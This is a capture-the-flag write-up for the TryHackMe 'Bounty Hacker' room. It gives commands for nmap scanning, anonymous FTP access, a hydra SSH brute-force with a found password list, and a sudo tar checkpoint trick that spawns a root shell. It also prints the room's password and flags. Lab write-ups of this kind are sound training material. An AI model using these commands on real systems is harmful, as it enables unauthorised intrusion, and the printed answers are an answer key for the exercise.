TryHackMe: Bounty Hacker CTF

Hello everyone, this is a simple and straightforward writeup on how I completed the TryHackMe | Bounty Hacker CTF.
You can find the room here.

After deploying the machine, we run an nmap scan against the target IP. I usually like to do a null scan first.

nmap -sN <TARGET_IP>

Output:

nmap null scan

No results. We next move to the SYN scan.

nmap -sS -sV <TARGET_IP>

We found three open ports. Awesome !!

We anonymously login on the ftp port using the following command and enter the Name as ‘anonymous’ when prompted:

ftp <TARGET_IP>

We then list all the files and get them on our local machine.

ftp> ls

ftp> get locks.txt

ftp> get tasks.txt

ftp login

We then look at the contents of tasks.txt

So after exiting out of ftp,

cat task.txt

Output:

contents of task.txt and locks.txt

Q. Who wrote the task list?
Ans: lin

Q. Next, what service can we bruteforce with the textfile found?
Ans: ssh
Since there is only one other port aside ftp and that is ‘ssh’.

Now we get a rough idea of who the user might be (i.e lin)

So lets use this information and the file locks.txt which looks like a password list to bruteforce into ssh.
We will be using hydra for this

hydra -l lin -P locks.txt <TARGET_IP> ssh

Output:

using hydra to bruteforce ssh login

Q. What is the users password?

Ans. RedDr4gonSynd1cat3

Now that we have the credentials, lets ssh into the system.

ssh lin@<TARGET_IP>

ssh using lin’s credentials

Q. user.txt

Ans: THM{CR1M3_SyNd1C4T3}

Now we need to escalate our privileges to look for the root flag.
To do so, we will be running the following command to check the list of commands lin can run with sudo

sudo -l

Output:

Next, we head to gtfobins.github.io and check if we can spawn a root shell using the tar command.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

After running the above command, a root shell is spawned and we now have access to the root flag

Q. root.txt

Ans: THM{80UN7Y_h4cK3r}